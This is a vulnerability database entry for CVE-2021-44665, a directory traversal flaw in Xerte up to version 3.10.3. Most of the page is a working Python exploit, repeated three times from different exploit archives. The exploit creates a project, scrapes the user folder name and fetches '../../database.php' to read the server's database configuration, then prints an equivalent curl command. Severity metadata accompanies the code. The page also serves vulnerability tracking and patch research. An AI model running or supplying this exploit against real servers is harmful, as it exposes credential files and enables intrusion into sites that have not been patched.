Xerte 3.10.3 Directory Traversal

2022-03-02T00:00:00

Description

{"id": "PACKETSTORM:166181", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Xerte 3.10.3 Directory Traversal", "description": "", "published": "2022-03-02T00:00:00", "modified": "2022-03-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166181/Xerte-3.10.3-Directory-Traversal.html", "reporter": "Rik Lutz", "references": [], "cvelist": ["CVE-2021-44665"], "immutableFields": [], "lastseen": "2022-03-02T17:17:20", "viewCount": 114, "enchantments": {"backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-44665"]}, {"type": "exploitdb", "idList": ["EDB-ID:50794"]}, {"type": "zdt", "idList": ["1337DAY-ID-37436"]}]}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44665"]}, {"type": "exploitdb", "idList": ["EDB-ID:50794"]}, {"type": "zdt", "idList": ["1337DAY-ID-37436"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "vulnersScore": 5.7}, "_state": {"dependencies": 1646420246}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166181/xerte3103-traversal.txt", "sourceData": "`# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated) \n# Date: 05/03/2021 \n# Exploit Author: Rik Lutz \n# Vendor Homepage: https://xerte.org.uk \n# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip \n# Version: up until 3.10.3 \n# Tested on: Windows 10 XAMP \n# CVE : CVE-2021-44665 \n \n# This PoC assumes guest login is enabled. Vulnerable url: \n# https://<host>/getfile.php?file=<user-direcotry>/../../database.php \n# You can find a userfiles-directory by creating a project and browsing the media menu. \n# Create new project from template -> visit \"Properties\" (! symbol) -> Media and Quota -> Click file to download \n# The userfiles-direcotry will be noted in the URL and/or when you download a file. \n# They look like: <numbers>-<username>-<templatename> \n \nimport requests \nimport re \n \nxerte_base_url = \"http://127.0.0.1\" \nfile_to_grab = \"/../../database.php\" \nphp_session_id = \"\" # If guest is not enabled, and you have a session ID. Put it here. \n \nwith requests.Session() as session: \n# Get a PHP session ID \nif not php_session_id: \nsession.get(xerte_base_url) \nelse: \nsession.cookies.set(\"PHPSESSID\", php_session_id) \n \n# Use a default template \ndata = { \n'tutorialid': 'Nottingham', \n'templatename': 'Nottingham', \n'tutorialname': 'exploit', \n'folder_id': '' \n} \n \n# Create a new project in order to create a user-folder \ntemplate_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) \n \n# Find template ID \ndata = { \n'template_id': re.findall('(\\d+)', template_id.text)[0] \n} \n \n# Find the created user-direcotry: \nuser_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) \nuser_direcotry = re.findall('USER-FILES\\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0] \n \n# Grab file \nresult = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) \nprint(result.text) \nprint(\"|-- Used Variables: --|\") \nprint(\"PHP Session ID: \" + session.cookies.get_dict()['PHPSESSID']) \nprint(\"user direcotry: \" + user_direcotry) \nprint(\"Curl example:\") \nprint('curl --cookie \"PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '\" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) \n \n \n`\n"}

{"cve": [{"lastseen": "2022-03-23T19:53:55", "description": "A Directory Traversal vulnerability exists in the Xerte Project Xerte through 3.10.3 when downloading a project file via download.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-24T21:15:00", "type": "cve", "title": "CVE-2021-44665", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44665"], "modified": "2022-03-04T19:28:00", "cpe": ["cpe:/a:xerte:xerte:3.10.3"], "id": "CVE-2021-44665", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44665", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:xerte:xerte:3.10.3:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2022-03-04T21:44:39", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-02T00:00:00", "type": "zdt", "title": "Xerte 3.10.3 - Directory Traversal (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44665"], "modified": "2022-03-02T00:00:00", "id": "1337DAY-ID-37436", "href": "https://0day.today/exploit/description/37436", "sourceData": "# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)\n# Exploit Author: Rik Lutz\n# Vendor Homepage: https://xerte.org.uk\n# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip\n# Version: up until 3.10.3\n# Tested on: Windows 10 XAMP\n# CVE : CVE-2021-44665\n\n# This PoC assumes guest login is enabled. Vulnerable url:\n# https://<host>/getfile.php?file=<user-direcotry>/../../database.php\n# You can find a userfiles-directory by creating a project and browsing the media menu.\n# Create new project from template -> visit \"Properties\" (! symbol) -> Media and Quota -> Click file to download\n# The userfiles-direcotry will be noted in the URL and/or when you download a file.\n# They look like: <numbers>-<username>-<templatename>\n\nimport requests\nimport re\n\nxerte_base_url = \"http://127.0.0.1\"\nfile_to_grab = \"/../../database.php\"\nphp_session_id = \"\" # If guest is not enabled, and you have a session ID. Put it here.\n\nwith requests.Session() as session:\n # Get a PHP session ID\n if not php_session_id:\n session.get(xerte_base_url) \n else:\n session.cookies.set(\"PHPSESSID\", php_session_id)\n\n # Use a default template\n data = {\n 'tutorialid': 'Nottingham',\n 'templatename': 'Nottingham',\n 'tutorialname': 'exploit',\n 'folder_id': ''\n }\n\n # Create a new project in order to create a user-folder\n template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)\n\n # Find template ID\n data = {\n 'template_id': re.findall('(\\d+)', template_id.text)[0]\n }\n\n # Find the created user-direcotry:\n user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)\n user_direcotry = re.findall('USER-FILES\\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]\n\n # Grab file\n result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)\n print(result.text)\n print(\"|-- Used Variables: --|\")\n print(\"PHP Session ID: \" + session.cookies.get_dict()['PHPSESSID'])\n print(\"user direcotry: \" + user_direcotry)\n print(\"Curl example:\")\n print('curl --cookie \"PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '\" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)\n", "sourceHref": "https://0day.today/exploit/37436", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-03-05T01:28:10", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-02T00:00:00", "type": "exploitdb", "title": "Xerte 3.10.3 - Directory Traversal (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44665", "2021-44665"], "modified": "2022-03-02T00:00:00", "id": "EDB-ID:50794", "href": "https://www.exploit-db.com/exploits/50794", "sourceData": "# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)\r\n# Date: 05/03/2021\r\n# Exploit Author: Rik Lutz\r\n# Vendor Homepage: https://xerte.org.uk\r\n# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip\r\n# Version: up until 3.10.3\r\n# Tested on: Windows 10 XAMP\r\n# CVE : CVE-2021-44665\r\n\r\n# This PoC assumes guest login is enabled. Vulnerable url:\r\n# https://<host>/getfile.php?file=<user-direcotry>/../../database.php\r\n# You can find a userfiles-directory by creating a project and browsing the media menu.\r\n# Create new project from template -> visit \"Properties\" (! symbol) -> Media and Quota -> Click file to download\r\n# The userfiles-direcotry will be noted in the URL and/or when you download a file.\r\n# They look like: <numbers>-<username>-<templatename>\r\n\r\nimport requests\r\nimport re\r\n\r\nxerte_base_url = \"http://127.0.0.1\"\r\nfile_to_grab = \"/../../database.php\"\r\nphp_session_id = \"\" # If guest is not enabled, and you have a session ID. Put it here.\r\n\r\nwith requests.Session() as session:\r\n # Get a PHP session ID\r\n if not php_session_id:\r\n session.get(xerte_base_url) \r\n else:\r\n session.cookies.set(\"PHPSESSID\", php_session_id)\r\n\r\n # Use a default template\r\n data = {\r\n 'tutorialid': 'Nottingham',\r\n 'templatename': 'Nottingham',\r\n 'tutorialname': 'exploit',\r\n 'folder_id': ''\r\n }\r\n\r\n # Create a new project in order to create a user-folder\r\n template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)\r\n\r\n # Find template ID\r\n data = {\r\n 'template_id': re.findall('(\\d+)', template_id.text)[0]\r\n }\r\n\r\n # Find the created user-direcotry:\r\n user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)\r\n user_direcotry = re.findall('USER-FILES\\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]\r\n\r\n # Grab file\r\n result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)\r\n print(result.text)\r\n print(\"|-- Used Variables: --|\")\r\n print(\"PHP Session ID: \" + session.cookies.get_dict()['PHPSESSID'])\r\n print(\"user direcotry: \" + user_direcotry)\r\n print(\"Curl example:\")\r\n print('curl --cookie \"PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '\" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)", "sourceHref": "https://www.exploit-db.com/download/50794", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}}]}

Xerte 3.10.3 Directory Traversal

Description

Related